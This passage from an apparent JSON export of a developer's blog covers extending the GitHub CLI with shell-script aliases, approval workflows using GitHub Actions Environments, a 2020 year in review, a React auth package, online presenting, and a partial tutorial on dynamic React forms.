this alias within the config file for the CLI (usually at ~/.config/gh/config.yml). If this file doesn’t exist, go ahead and create it and add an aliases section to it and scaffold out our starting point:\n1 2 3 aliases: action: |- echo TODO Great, now we can run gh action and it’ll echo back a note to us. Time to start using the gh api command.\n1 2 3 aliases: action: |- !gh api /repos/:owner/:repo/actions/workflows What we’ve done here is made a shell script that, when executed, will return the JSON payload from the API. If I run this on my FSharp.CosmosDB repo I get the following output to the terminal:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 { "total_count": 3, "workflows": [ { "id": 744033, "node_id": "MDg6V29ya2Zsb3c3NDQwMzM=", "name": "Build release candidate", "path": ".github/workflows/build-master.yml", "state": "active", "created_at": "2020-03-12T17:07:41.000+11:00", "updated_at": "2020-03-12T17:07:41.000+11:00", "url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/workflows/744033", "html_url": "https://github.com/aaronpowell/FSharp.CosmosDb/blob/main/.github/workflows/build-master.yml", "badge_url": "https://github.com/aaronpowell/FSharp.CosmosDb/workflows/Build%20release%20candidate/badge.svg" }, { "id": 3865909, "node_id": "MDg6V29ya2Zsb3czODY1OTA5", "name": "CI build", "path": ".github/workflows/ci.yml", "state": "active", "created_at": "2020-11-27T13:50:00.000+11:00", "updated_at": "2020-11-27T13:50:00.000+11:00", "url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/workflows/3865909", "html_url": "https://github.com/aaronpowell/FSharp.CosmosDb/blob/main/.github/workflows/ci.yml", "badge_url": "https://github.com/aaronpowell/FSharp.CosmosDb/workflows/CI%20build/badge.svg" }, { "id": 4075965, "node_id": "MDg6V29ya2Zsb3c0MDc1OTY1", "name": "Release build", "path": ".github/workflows/release.yml", "state": "active", "created_at": "2020-12-07T14:26:25.000+11:00", "updated_at": "2020-12-07T14:26:25.000+11:00", "url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/workflows/4075965", "html_url": "https://github.com/aaronpowell/FSharp.CosmosDb/blob/main/.github/workflows/release.yml", "badge_url": "https://github.com/aaronpowell/FSharp.CosmosDb/workflows/Release%20build/badge.svg" } ] } Job done, ship it.\nImproving the output Ok, so maybe just dumping the JSON out like that isn’t super useful, maybe we only want a part of the data, say, the names of the workflows. Well to do that we can parse the JSON with jq (no, not that jq).\nLet’s go back to updating our alias:\n1 2 3 aliases: action: |- !gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name, id: .id })" We’re using jq to find the .workflows property at the response root, then pulling out the name of each workflow and returning just that:\n1 [{"name":"Build release candidate","id":744033},{"name":"CI build","id":3865909},{"name":"Release build","id":4075965}] Note: the -c flag to jq returns a condensed version of the JSON, so it’s on a single line. We’ll need that shortly.\nThat’s looking better, but I don’t really want it as JSON, I want it more human readable, I just want the names. Well, to do that we can unpack the array as separate items:\n1 2 3 aliases: action: |- !gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name, id: .id }) | .[]" Which gives us this output:\n1 2 3 {"name":"Build release candidate","id":744033} {"name":"CI build","id":3865909} {"name":"Release build","id":4075965} And we’ll wrap up by turning it back to a plain string using a while loop:\n1 2 3 4 5 aliases: action: |- !gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name, id: .id }) | .[]" | while read i; do echo $i | jq -r '.name' done Tada! 🎉\n1 2 3 4 $ gh action Build release candidate CI build Release build Note: I’m only picking out the .name from each item for display, so the map does more than it needs to, but I wanted to show that you could get a complex object but pick a subset of it.\nMultiple operations from a single alias This is great and all, but getting a list of workflow names isn’t the only thing you’re likely to want from the command, maybe you also want to get some info about a particular workflow run.\nUnfortunately, gh alias is only one level deep, so gh action is all it can do, it can’t do gh action list… unless we expand our shell scripting!\nIf we use the case operation in our script, we could expand our alias to do whatever we want.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 aliases: action: |- !(case $1 in list) gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name, id: .id }) | .[]" | while read i; do echo $i | jq -r '.name' done ;; *) echo The following commands are supported from '\\e[1;31m'gh action'\\e[0m': echo '\\t\\e[1;32m'list'\\e[0m' echo '\\t\\t'Returns the names of all workflows for the repo ;; esac) The way this works is that the gh action will then look at the first argument provided, $1, and then see if it matches any of the specified case switches, meaning that we can run gh action list to get output:\n1 2 3 4 5 FSharp.CosmosDb on  main via .NET 5.0.102 $ gh action list Build release candidate CI build Release build We’ve also implemented a catch all case, *, so that we can handle unexpected input and return a help system.\n1 2 3 4 $ gh action help The following commands are supported from gh action: list Returns the names of all workflows for the repo With this in place, you can write as complex an alias as you want! Here’s mine that also includes getting the information for a workflow run:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 aliases: action: |- !(case $1 in get) jq_filter=$([ "$2" ] && echo "map(. | select(.name == \\"$2\\")) | first" || echo 'first') res=$(gh api /repos/:owner/:repo/actions/runs | jq -r ".workflow_runs | $jq_filter") url=$(echo $res | jq -r '.html_url') status=$(echo $res | jq -r '.status') name=$(echo $res | jq -r '.name') created=$(echo $res | jq -r '.created_at' | xargs date '+%A %b %d @ %H:%m' --date) echo '\\e[1;34m'$name'\\e[0m' \\($url\\) echo '\\t'Started: '\\e[1;33m'$created'\\e[0m' case $status in completed) echo '\\t'Status: '\\e[1;32m'$status '\\e[0m'\\('\\e[1;33m'$(echo $res | jq -r '.conclusion')'\\e[0m'\\)'\\e[0m' echo '\\t'Completed: '\\e[1;32m'$(echo $res | jq -r '.updated_at' | xargs date '+%A %b %d @ %H:%m' --date)'\\e[0m' ;; waiting) echo '\\t'Waiting... ;; esac ;; list) gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name }) | .[]" | while read i; do echo $i | jq -r '.name' done ;; *) echo The following commands are supported from '\\e[1;31m'gh action'\\e[0m': echo '\\t\\e[1;32m'get'\\e[0m' '\\e[1;33m?workflow name\\e[0m' echo '\\t\\t'Returns info of the most recent Action run. If '\\e[1;33m'workflow name'\\e[0m' is provided, it will return the most recent run for that workflow echo '\\t\\e[1;32m'list'\\e[0m' echo '\\t\\t'Returns the names of all workflows for the repo ;; esac) And it will return the following:\n1 2 3 4 5 $ gh action get "Release build" Release build (https://github.com/aaronpowell/FSharp.CosmosDb/actions/runs/459861911) Started: Monday Jan 04 @ 09:01 Status: completed (failure) Completed: Monday Jan 04 @ 09:01 You can find my config file on my GitHub.\nConclusion With a little bit of scripting magic we’ve been able to create a nice new feature on the GitHub CLI that can show us information about the GitHub Actions in our repository. This pattern can be applied to anything you want from the GitHub API, either the REST or GraphQL, depending on what’s available where.\nHave you been doing any extensions on the GitHub CLI? Share them below so we can get as much power as possible.\n", "id": "2021-01-22-extending-the-github-cli" }, { "title": "Using Environments for Approval Workflows With GitHub Actions", "url": "https://www.aaron-powell.com/posts/2021-01-11-using-environments-for-approval-workflows-with-github/", "date": "Mon, 11 Jan 2021 10:33:48 +1100", "tags": [ "devops", "javascript" ], "description": "", "content": "Last year I wrote a post about how I implemented an overly complex approval workflow with GitHub Actions. While it wasn’t the simplest solution, at the time it was a means to an end as we didn’t have any built-in way to do approval workflows with GitHub Actions. At the end of last year that changed with the introduction of Environments (announcement post). Environments bring in the concept of protection rules, which currently supports two types, required reviewers and a wait timer, which is exactly what we need for an approval workflow.\nSo with this available to us, let’s look at taking the workflow to publish GitHub Packages and turn it into an approval-based workflow.\nSetting up Environments Navigate to the GitHub repo you want to set this up on and then go to Settings -> Environments.\nFrom here we can create new Environments. You can make as many as you need, and you can have different sets of environments for different workflows, they don’t have to be reused or generic. We’ll create two environments, one called build, which will be the normal compilation step of our workflow and one called release, which will have the approval on it and used to publish to our package registry (I’m using npm here, but it could be NuGet, or anything else).\nOn the Configure release screen we’ll add a protection rule of Required reviewer, and I’ve added myself as the person required, but set whoever is the right person for this environment (you can nominate up to 6 people).\nRemember to click Save protection rules (I kept forgetting!), and your environments are good to go.\nImplementing our workflow With the Environments setup, we can now return to our GitHub Actions workflow and overhaul it to work with the Environments. We’ll also take this opportunity to have our workflow create a GitHub Release for us as well.\nTo achieve this, we’ll have four distinct environments, build to create the package and draft a GitHub Release, release to publish the GitHub Release, publish-npm to publish the package to npm and publish-gpr to publish to GitHub Packages. The release stage will need to wait until build has completed, and we’ve approved the release, and the two publish environments will wait for the release stage to complete.\nNote: publish-npm and publish-gpr aren’t created as Environments in GitHub but they are implicit Environments. You could create explicit environments if you wanted protection rules, but I wanted to show how you can use explicit and implicit Environments together.\nLet’s scaffold the workflow:\n1 2 3 4 5 6 7 8 9 10 11 name: Publish a release on: push: tags: - v* #version is cut env: NODE_VERSION: 12 jobs: It’s going to be triggered on a new version tag being pushed, which I like to do manually.\nThe build stage We’ll start by associating the build job with the Environment:\n1 2 3 4 5 6 7 8 9 10 jobs: build: runs-on: ubuntu-latest defaults: run: working-directory: react-static-web-apps-auth environment: name: build url: ${{ steps.create_release.outputs.html_url }} steps: Note: you can ignore the working-directory default, I need that due to the structure of my Git repo. It’s left in for completeness of the workflow file at the end.\nTo link the job to the Environment we created in GitHub we add an environment node and provide it the name of the Environment we created, build in this case. You can optionally provide an output URL to the run, and since we’ll be creating a draft Release, we can use that as the URL, but if you were deploying to somewhere, then you could use the URL of the deployed site.\nNow we can add the steps needed:\n1 2 3 4 5 6 7 8 9 10 11 12 steps: - uses: actions/checkout@v2 - name: Create Release id: create_release uses: actions/create-release@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: tag_name: ${{ github.ref }} release_name: Release ${{ github.ref }} draft: true prerelease: false Here we’re using actions/create-release to create a Release on GitHub and setting it to draft, as it’s not yet approved. This step has an id set, create_release, which is what we used to get the release URL for the Environment output and will need to upload artifacts shortly.\nYou can add the appropriate build/test/etc. steps after this one, again this is an example with a JavaScript project and I’m using npm, so change to your platform of choice:\n1 2 3 4 5 6 7 8 - uses: actions/setup-node@v1 with: node-version: ${{ env.NODE_VERSION }} - run: | npm ci npm run lint npm run build npm pack With this step we’re generating the package that will go to our package registry, but since we’re not publishing yet (that’s a future jobs responsibility), we need a way to make it available to the future jobs. For that we’ll publish it as an artifact of the workflow, using actions/upload-artifact:\n1 2 3 4 5 - name: Upload uses: actions/upload-artifact@v2 with: name: package path: "react-static-web-apps-auth/*.tgz" It’d also be good if the Release we’re creating had the package attached to it, if people want to download it rather than use a package registry, and we can do that with actions/upload-release-asset. The only problem is that we need to find out the full name of the package, including version, but that’s dynamic. To tackle this I create an environment variable containing the tag, extracted from GITHUB_REF using some bash magic:\n1 2 3 4 5 6 7 8 9 10 - run: echo "tag=${GITHUB_REF##*/v}" >> $GITHUB_ENV - name: Upload package to release uses: actions/upload-release-asset@v1 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} with: upload_url: ${{ steps.create_release.outputs.upload_url }} asset_path: "react-static-web-apps-auth/aaronpowell-react-static-web-apps-auth-${{ env.tag }}.tgz" asset_name: "aaronpowell-react-static-web-apps-auth-${{ env.tag }}.tgz" asset_content_type: application/zip Again, we’re using the create_release step output to get the URL needed to upload the assets, another reason why you need to give that step an id.\nThe last thing that this job needs to do is let the future ones (in particular release) know what the id of the GitHub Release is, so it can publish it from draft. It doesn’t look like the step outputs are available across environments (and this is something I also hit with Azure Pipelines), so the solution I have for this is to put it in a text file and upload it as an artifact of the build.\n1 2 3 4 5 6 - run: echo ${{ steps.create_release.outputs.id }} >> release.txt - name: Upload uses: actions/upload-artifact@v2 with: name: release_id path: react-static-web-apps-auth/release.txt build is done, time for release.\nThe release stage Like build, the release stage needs to have an environment node that references the correct Environment name, this is how GitHub will know to apply the protection rules for you. But since this Environment doesn’t have any output, we’re not going to need to set a url property.\n1 2 3 4 5 release: needs: build runs-on: ubuntu-latest environment: name: release You’ll also notice the needs property in there as well. This tells us that this job can’t run until build has completed, which makes sense as we’re waiting on some outputs from there.\nThis phase of our workflow will only be responsible the draft status from the GitHub Release, and to do that we’ll need to call the GitHub API and tell it which Release to edit, so we’ll need to artifact that we published at the end of the last job.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 steps: - name: Download package uses: actions/download-artifact@v2 with: name: release_id - run: echo "release_id=$(cat release.txt)" >> $GITHUB_ENV - name: Publish release uses: actions/github-script@v3 with: github-token: ${{secrets.GITHUB_TOKEN}} script: | github.repos.updateRelease({ owner: context.repo.owner, repo: context.repo.repo, release_id: process.env.release_id, draft: false }) We download the artifact with actions/download-artifact and then export the context of the text file as an environment variable called release_id. Then, in the actions/github-script step we’ll use the updateRelease operation. Since actions/github-script is running as a JavaScript script, to access environment variables we can use process.env, and that gives us access to process.env.release_id as needed.\nWith this complete, our release is no longer in draft and we can publish the packages to their respective registries.\nPublishing to npm and GitHub Packages I’ll only show the workflow steps for npm here, as GitHub Packages is virtually the same and can be read about in this post.\nThis part of our workflow is rather straight forward since we’ve already built our package, all that’s left to do is download the artifact from the current run and publish to npm.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 publish-npm: needs: release runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - name: Download package uses: actions/download-artifact@v2 with: name: package - uses: actions/setup-node@v1 with: node-version: ${{ env.NODE_VERSION }} registry-url: https://registry.npmjs.org/ - run: npm publish $(ls *.tgz) --access public env: NODE_AUTH_TOKEN: ${{secrets.npm_token}} As we have the tgz file, we don’t need to repack, we’ll just pass the filename into npm publish (obtained from ls *.tgz), and since it’s a scoped package that everyone can use, we are setting the access to public.\nRunning the workflow With the new workflow ready to run, all it takes is a push with a tag for it to kick off. When the build phase completes, the reviewer(s) will receive an email and a notice on the Action in the GitHub UI.\nApprove it, and the rest of the stages will run through to completion (hopefully…).\nConclusion Throughout this post we’ve created a new GitHub Action workflow that will build and release a package, but still give us the safety net of requiring a manual approval step before it is ultimately released.\nYou can find the successful run I demonstrated here on my own project, and the commit diff from a previous project that released to npm automatically.\nHave you had a chance to implement anything using the approval process in GitHub Actions? Let me know as I’d love to see what else people are doing with it.\n", "id": "2021-01-11-using-environments-for-approval-workflows-with-github" }, { "title": "2020 a Year in Review", "url": "https://www.aaron-powell.com/posts/2021-01-04-2020-a-year-in-review/", "date": "Mon, 04 Jan 2021 15:05:05 +1100", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "As is tradition, I’m starting off 2021 with my 2020 year in review blog post and it’s been fun looking back at the one I wrote last year, in particular my closing remark:\nHope to see you around some events!\nOh how things changed.\nMy original start to 2020 was looking like a lot of travel, but after our team on-site in Seattle and a ski trip to Japan in the start of March, that was it. I, like most of the world, was grounded and started transitioning to more online content.\nBlogging Blogging featured heavily in 2020, my goal was to keep around a post-per-week cadence, and I hit close to that with 50 posts across the year (slightly down from the 58 the previous year), with a main series on GraphQL and Azure and more broadly a lot of my content focused on Azure Static Web Apps which went into preview and GitHub Actions, which I’ve been using a lot (and not just because it ties into Static Web Apps).\nPresenting Online With in-person events on hold, many communities looked to online as an option. I covered topics like getting started with Docker, using Blazor with Static Web Apps and TypeScript + GraphQL + GitHub Codespaces.\nI even looked at how to interact with an audience through PowerPoint automation, something that I’m hoping to explore more this year as we continue with virtual presentations.\nAnd I shared my learnings with running a virtual workshop and my observations with virtual events.\nThat said, I did do an in-person talk, which was going well until the power went out!\nStreaming Like nearly everyone I know, 2020 was the year I started streaming on Twitch. My streaming was a bit haphazard, tackling a few different projects and not completing them (hey, always time to start a new side project!). You can catch all the random streams I’ve done on YouTube, or the specific projects such as building a video calling app, building a timezone app or converting an ASP.NET Core app to Serverless.\nLooking Forward It’s tough to really think what 2021 will bring, with the uncertainty around COVID, and the broader economic impacts of it.\nI’m going to keep working on how to do online content effectively, shortly I’ll start sharing what I’ve learnt with the myriad of tools. Expect to see me around at online communities and events, while they might not be the same as in-person, there’s a lot of value that they can bring.\nAdditionally, this year I’m embarking on an ambitious project with my wife, we’re rebuilding our house. So expect to see some posts on here about the technical aspects I’m looking to tackle, from the networking infrastructure to home automation, and how to tackle it in a brand new house.\nAnd with that, stay safe, stay distant and stay masked up.\n", "id": "2021-01-04-2020-a-year-in-review" }, { "title": "Simplifying Auth With Static Web Apps and React", "url": "https://www.aaron-powell.com/posts/2020-12-21-simplifying-auth-with-static-web-apps-and-react/", "date": "Mon, 21 Dec 2020 15:41:00 +1100", "tags": [ "javascript", "azure", "serverless" ], "description": "I created a small npm package to make SWA auth simpler in React apps", "content": "It’s no secret that I’m a fan of Azure Static Web Apps and I’m constantly looking for ways to make it easier for people to get working with it.\nSomething I hadn’t done much with until recently was work with the Authentication and Authorization aspect of it; I knew it was there, but I wasn’t building anything that required it.\nWhile building a video chat app on Twitch I found myself jumping back and forth to the documentation to make sure that I was creating the login URLs correctly, loading the profiles, etc. and so it’s time to do something about it.\nIntroducing react-static-web-apps-auth I created a npm package, @aaronpowell/react-static-web-apps-auth, which helps simplify development.\nIt introduces a component, <StaticWebAppsAuthLogins />, which will display all the auth providers (you can hide them by setting their corresponding prop to false), as well as a <Logout /> component and a React Context provider, <UserInfoContextProvider>, to give up access to the current user profile.\nIf you’re interested in the process of building it, I streamed that, including setting up a GitHub Actions pipeline with package deployment (like I blogged recently).\n", "id": "2020-12-21-simplifying-auth-with-static-web-apps-and-react" }, { "title": "Leveling Up Online Presentations", "url": "https://www.aaron-powell.com/posts/2020-12-15-leveling-up-online-presentations/", "date": "Tue, 15 Dec 2020 11:41:34 +1100", "tags": [ "public-speaking" ], "description": "The result of me nerd-sniping myself", "content": "Like all good nerd snipes it starts with a tweet:\nWould anyone be interested in an "OBS for technical presenters session, where we look at tools to improve the experience of online presentations in interesting ways?\n— Aaron Powell (@slace) October 21, 2020 But the thing is, you’re not meant to do it to yourself… but here we are, 145 likes and 41 comments later, I guess people are interested in this content, so it’s time I tackle it.\nStarting with a problem Over the past year I’ve been spending a lot of time looking into how to make the most engaging online presentation experience that I can, as no one knows when we’ll be back to doing in-person events in the way we use to. As someone who does a lot of talks and tried to be very energetic in their presentations, regardless of what happens, I wanted to bring that same experience online.\nI haven’t come from a video production background so it was quite confusing as to how one gets started. I saw people talking about tools like Open Broadcaster Software (OBS) and NDI, setting up green screens and using sound boards. But everything I found was for the person who was streaming video games to Twitch, and while Twitch can be a useful platform for technical content (case in point, I have a Twitch stream), the experience streaming is very different to the experience of presenting at a conference.\nTalking with my friends and colleagues, we all had similar experiences. We’d worked some of this stuff out, but it was pieced together through experiments, trial and error, and calling each other making the other person a guinea pig (and hopefully not blowing out their ear drums).\nBridging the content gap So, I nerd sniped myself, what am I going to do about it? In the new year I’ll start putting together some video and written tutorials covering some of the key topics that I feel are important for people when they are doing online presentations, such as OBS, and how to get the most value out of them.\nI’m also contemplating doing some online “workshops”, where we can jump in together and see some of this stuff in action as a more “giving a talk” experience, in addition to pre-recorded content, so if that sounds interesting, let me know through any of the variety of comms channels I’m on.\nWhat this content isn’t The goal of this content will be around the technical tools to make an online present successful, but that’s only part of it. For speaker tips I’d encourage everyone to check out this great post by Sonia Cuff and video from pyconline AU 2020, which cover off a number of great tips about your physical space, and how to engage with a virtual audience. After all, you can have the most amazing technical setup, but if you can’t be seen or more importantly, heard, it’s all for nothing.\nNext steps With the end of the year virtually (ha!) upon us, I’m going to start this in 2021, so keep an eye out for the content as it starts coming out, and if there’s something specific you’d like to learn about, do get in contact.\n", "id": "2020-12-15-leveling-up-online-presentations" }, { "title": "Creating Dynamic Forms With React Hooks", "url": "https://www.aaron-powell.com/posts/2020-12-10-dynamic-forms-with-react-hooks/", "date": "Thu, 10 Dec 2020 07:58:10 +1100", "tags": [ "javascript" ], "description": "Dynamically generating forms can be a challenge, so let's break down how to do it with React Hooks", "content": "The other week my friend Amy Kapernick reached out because she was having a problem with React. She was working on a project that used a headless CMS to build and control multi page forms and the fields in it, including conditional fields/pages that appear/hide depending on the value of other fields. The headless CMS would then generate a JSON payload that was pulled into a Gatsby site and needed to be rendered as a React form that a user could walk through. While the form was building and rendering, her problem was working with different bits of state management and making sure to update the right things at the right time, and she needed another set of eyes on the problem.\nHaving built dynamic form generators in the past, built systems backed by generic form generators, and generally done a lot with dynamic forms, I knew just the sort of pain she was in for so I was happy to help.\nSo in this post, we’ll break down how you can make dynamic forms in React, including how to do conditional control over fields appearing and page navigation.\nDefining a data structure We’ll start by defining the data structure that we’ll use for this sample, but do keep in mind that the structure will be driven by the backend system the forms are designed in, so you’ll need to tweak accordingly.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [ { "component": "page", "label": "Page 1", "_uid": "0c946643-5a83-4545-baea-055b27b51e8a", "fields": [ { "component": "field_group", "label": "Name", "_uid": "eb169f76-4cd9-4513-b673-87c5c7d27e02", "fields": [ { "component": "text", "label": "First Name", "type": "text", "_uid": "5b9b79d2-32f2-42a1-b89f-203dfc0b6b98" }, { "component": "text", "label": "Last Name", "type": "text", "_uid": "6eff3638-80a7-4427-b07b-4c1be1c6b186" } ] }, { "component": "text", "label": "Email", "type": "email", "_uid": "7f885969-f8ba-40b9-bf5d-0d57bc9c6a8d" }, { "component": "text", "label": "Phone", "type": "text", "_uid": "f61233e8-565e-43d0-9c14-7d7f220c6020" } ] } ] The structure we’ve got here is intended to be simple. It is made from an array of pages, with each page identified by the component value of page, and within that is an array of fields that contains the inputs, or groups of inputs (again, denoted by the component property).\nCreating the form With the data structure ready, it’s time to create the form. We’ll start with a new component called Form:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import React from "react"; const Form = ({ formData }) => { const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form onSubmit={onSubmit}> <p>todo...</p> </form> ); }; export default Form; For this demo, the form won’t submit anywhere, but we’ll prevent the default action using preventDefault. The component will receive the formData as a prop, so it’s up to the parent component to work out how to get the data and pass it over, again, for this demo we’ll have it hard coded in the codebase, but for Amy’s situation it was being fetched as part of the Gatsby rendering process and included in the output bundle.\nDefining state There’s a bit of state that we’re going to have to manage in the React components, such as which page of the form we’re on and the values of the Controlled Components. For this, we’ll use Hooks so that we can stick with function components.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form onSubmit={onSubmit}> <p>todo...</p> </form> ); }; The first bit of state is the index of the current page, which starts at 0, and the second is the data for the page, plucked from the array, so we don’t need to constantly grab it constantly and we can respond to it changing using the useEffect Hook if required.\nRendering the form fields Let’s start by defining a generic field in a file called Field.jsx:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import React from "react"; const Field = ({ field, fieldChanged, type, value }) => { return ( <div key={field._uid}> <label htmlFor={field._uid}>{field.label}</label> <input type={type || field.component} id={field._uid} name={field._uid} value={value} onChange={e => fieldChanged(field._uid, e.target.value)} /> </div> ); }; export default Field; This will render out a label and input in a basic manner, update the HTML to the structure that’s required for your design (or render out fields from a form library like Formik). The two props that are likely to be of most interest as the value and fieldChanged. The value prop is the current value for the Controlled Component, which will come from the Form component itself (we’ve not implemented that yet) and fieldChanged will be used to update this main state list.\nLet’s go about rendering out the fields in the Form component:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form onSubmit={onSubmit}> <h2>{currentPageData.label}</h2> {currentPageData.fields.map(field => { switch (field.component) { case "field_group": return ( <FieldGroup key={field._uid} field={field} fieldChanged={fieldChanged} values={values} /> ); case "options": return ( <Option key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); default: return ( <Field key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); } })} </form> ); }; You’ll notice a few more types of fields rendered out here, I’ll skip their implementations in the blog post, but you can check out the full sample for them.\nWe’re iterating over currentPageData.fields and using a switch statement to work out what kind of field we want to render based on the field.component. it’s then a matter of passing in the right props. But there’s something missing, what are fieldChanged and values, they currently don’t exist.\nHandling user input To handle the user input, we’re going to need two things, somewhere to store that input, and a function to do the updating. Let’s start with the storage, which is going to be a new bit of state in Hooks:\n1 2 3 4 5 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // snip The values object is going to act as a dictionary so we can do values[field._uid] to get the value out for a field, but as per the requirements of a Controlled Component, we need to initialise the value, and we can do that with the useEffect Hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // this effect will run when the `page` changes useEffect(() => { const upcomingPageData = formData[page]; setCurrentPageData(upcomingPageData); setValues(currentValues => { const newValues = upcomingPageData.fields.reduce((obj, field) => { if (field.component === "field_group") { for (const subField of field.fields) { obj[subField._uid] = ""; } } else { obj[field._uid] = ""; } return obj; }, {}); return Object.assign({}, newValues, currentValues); }); }, [page, formData]); // snip This Effect has two dependencies, page and formData, so if either changes (although it really will only be page that changes) it will run. When it runs it’ll get the next page we’re going to from the page state value, and set that as the current page using setCurrentPageData. Once that’s done, we’ll initialise any new fields on the values state using a callback to the setValues updater function that uses a reduce method to iterate over the fields and builds up a new object containing the newly initialised fields. Finally, it’ll merge the newly initialised field values with any existing values to produce the new values state.\nTip: using Object.assign like this will merge the objects in the order specified, meaning the right-most object values will take precedence, so if you navigate backwards on the form, your previous values are still there.\nWith the values now available to the Controlled Components, all that’s left is creating a function to update them.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // this effect will run when the `page` changes useEffect(() => { const upcomingPageData = formData[page]; setCurrentPageData(upcomingPageData); setValues(currentValues => { const newValues = upcomingPageData.fields.reduce((obj, field) => { if (field.component === "field_group") { for (const subField of field.fields) { obj[subField._uid] = ""; } } else { obj[field._uid] = ""; } return obj; }, {}); return Object.assign({}, newValues, currentValues); }); }, [page, formData]); const fieldChanged = (fieldId, value) => { setValues(currentValues => { currentValues[fieldId] = value; return currentValues; }); setCurrentPageData(currentPageData => { return Object.assign({}, currentPageData); }); }; // snip The fieldChanged function will receive the fieldId (field._uid) and the new value. When called it’ll update the values state with the new value and then force a render by faking an update of the currentPageData state value, using Object.assign.\nWe need to fake the currentPageData update when the values change so that render phase of our component will be run, if not, the map function won’t be aware of the updated values and the inputs will never show the entered data.\nNow our full form is looking like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // this effect will run when the `page` changes useEffect(() => { const upcomingPageData = formData[page]; setCurrentPageData(upcomingPageData); setValues(currentValues => { const newValues = upcomingPageData.fields.reduce((obj, field) => { if (field.component === "field_group") { for (const subField of field.fields) { obj[subField._uid] = ""; } } else { obj[field._uid] = ""; } return obj; }, {}); return Object.assign({}, newValues, currentValues); }); }, [page, formData]); const fieldChanged = (fieldId, value) => { setValues(currentValues => { currentValues[fieldId] = value; return currentValues; }); setCurrentPageData(currentPageData => { return Object.assign({}, currentPageData); }); }; const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form onSubmit={onSubmit}> <h2>{currentPageData.label}</h2> {currentPageData.fields.map(field => { switch (field.component) { case "field_group": return ( <FieldGroup key={field._uid} field={field} fieldChanged={fieldChanged} values={values} /> ); case "options": return ( <Option key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); default: return ( <Field key={field._uid} field={field} fieldChanged={fieldChanged} value={values[field._uid]} /> ); } })} </form> ); }; Adding navigation Buttons, the form is missing buttons to do anything, be it submit the data or navigate between steps, let’s add those now:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 const Form = ({ formData }) => { const [page, setPage] = useState(0); const [currentPageData, setCurrentPageData] = useState(formData[page]); const [values, setValues] = useState({}); // this effect will run when the `page` changes useEffect(() => { const upcomingPageData = formData[page]; setCurrentPageData(upcomingPageData); setValues(currentValues => { const newValues = upcomingPageData.fields.reduce((obj, field) => { if (field.component === "field_group") { for (const subField of field.fields) { obj[subField._uid] = ""; } } else { obj[field._uid] = ""; } return obj; }, {}); return Object.assign({}, newValues, currentValues); }); }, [page, formData]); const fieldChanged = (fieldId, value) => { setValues(currentValues => { currentValues[fieldId] = value; return currentValues; }); setCurrentPageData(currentPageData => { return Object.assign({}, currentPageData); }); }; const onSubmit = e => { e.preventDefault(); // todo - send data somewhere }; return ( <form 